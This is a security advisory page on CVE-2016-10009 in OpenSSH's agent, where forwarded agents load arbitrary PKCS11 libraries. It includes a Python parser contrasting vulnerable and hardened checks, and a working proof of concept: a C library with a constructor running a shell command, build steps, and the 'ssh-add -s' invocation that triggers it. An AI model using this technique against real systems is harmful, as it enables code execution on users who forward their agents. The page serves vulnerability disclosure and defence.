Submitted URL: http://packetstormsecurity.com/files/140261/OpenSSH-Arbitrary-Library-Loading.html
Effective URL: https://packetstormsecurity.com/files/140261/OpenSSH-Arbitrary-Library-Loading.html
Submission: On November 27 via api from HU — Scanned from IT

OPENSSH ARBITRARY LIBRARY LOADING

OpenSSH Arbitrary Library Loading
Posted Dec 23, 2016 | Authored by Jann Horn, Google Security Research

tags | exploit, advisory | CVE-2016-10009 | SHA-256: 10d0d2808ffc63e1409341e7f4cd4e55ad32bf60b055a0cd27d7b6b8a3fa45ab

OpenSSH: agent protocol permits loading arbitrary libraries

CVE-2016-10009


The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.

This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.
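The agent-side handling described above, as an added example that is not OpenSSH's own code: a Python decoder for the SSH_AGENTC_ADD_SMARTCARD_KEY request (type 20; the _CONSTRAINED variant is 26, and its trailing constraints are not parsed here), with the provider check as the vulnerable agent applies it (already-loaded only) beside a hardened check. The allowlist globs are an assumption modelled on the -P pattern list ssh-agent gained in OpenSSH 7.4 as the fix for this issue; the request, paths and PIN are constructed.

```python
import fnmatch
import struct

# Message type numbers from OpenSSH's authfd.h.
SSH_AGENTC_ADD_SMARTCARD_KEY = 20
SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED = 26

# Assumed allowlist: modelled on the -P pattern list OpenSSH 7.4 added to ssh-agent.
PROVIDER_ALLOWLIST = ("/usr/lib*/*", "/usr/local/lib*/*")


def _get_string(buf, off):
    """Read an SSH wire 'string' (uint32 big-endian length + bytes) at off."""
    if off + 4 > len(buf):
        raise ValueError("truncated length field")
    (n,) = struct.unpack_from(">I", buf, off)
    off += 4
    if off + n > len(buf):
        raise ValueError("truncated string")
    return bytes(buf[off:off + n]), off + n

def build_add_smartcard(provider, pin, constrained=False):
    """Encode a framed request: uint32 length, byte type, string provider, string pin."""
    mtype = SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if constrained else SSH_AGENTC_ADD_SMARTCARD_KEY
    body = bytes([mtype])
    for field in (provider.encode(), pin.encode()):
        body += struct.pack(">I", len(field)) + field
    return struct.pack(">I", len(body)) + body

def parse_add_smartcard(frame):
    """Decode a framed request; returns (type, provider, pin). Constraints are ignored."""
    body, end = _get_string(frame, 0)
    if end != len(frame) or not body:
        raise ValueError("bad frame")
    mtype = body[0]
    if mtype not in (SSH_AGENTC_ADD_SMARTCARD_KEY, SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED):
        raise ValueError("not an add-smartcard request")
    provider, off = _get_string(body, 1)
    pin, _ = _get_string(body, off)
    return mtype, provider.decode(), pin.decode()

def vulnerable_accepts(provider, loaded=frozenset()):
    """Pre-fix agent: the only check before dlopen() is 'not already loaded'."""
    return provider not in loaded

def hardened_accepts(provider, loaded=frozenset(), allowlist=PROVIDER_ALLOWLIST):
    """Fixed agent: absolute path, no '..' segment, and a match against an allowlist glob."""
    if provider in loaded or not provider.startswith("/") or ".." in provider.split("/"):
        return False
    return any(fnmatch.fnmatchcase(provider, pat) for pat in allowlist)
```

Note that a glob's `*` matches `/` as well, so the explicit `..` segment check is what stops an allowlisted prefix from being walked back out of.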

To reproduce the issue, first create a library that executes some command when it is loaded:

$ cat evil_lib.c
#include <stdlib.h>
__attribute__((constructor)) static void run(void) {
  // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
  // prevent recursion through system()
  unsetenv("LD_PRELOAD");
  unsetenv("LD_LIBRARY_PATH");
  system("id > /tmp/test");
}
$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall

Connect to another machine using "ssh -A". Then, on the remote machine:

$ ssh-add -s [...]/evil_lib.so
Enter passphrase for PKCS#11: [just press enter here]
SSH_AGENT_FAILURE
Could not add card: [...]/evil_lib.so

At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:

$ cat /tmp/test
uid=1000(user) gid=1000(user) groups=[...]

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.



Found by: Jann Horn




© 2024 Packet Storm. All rights reserved.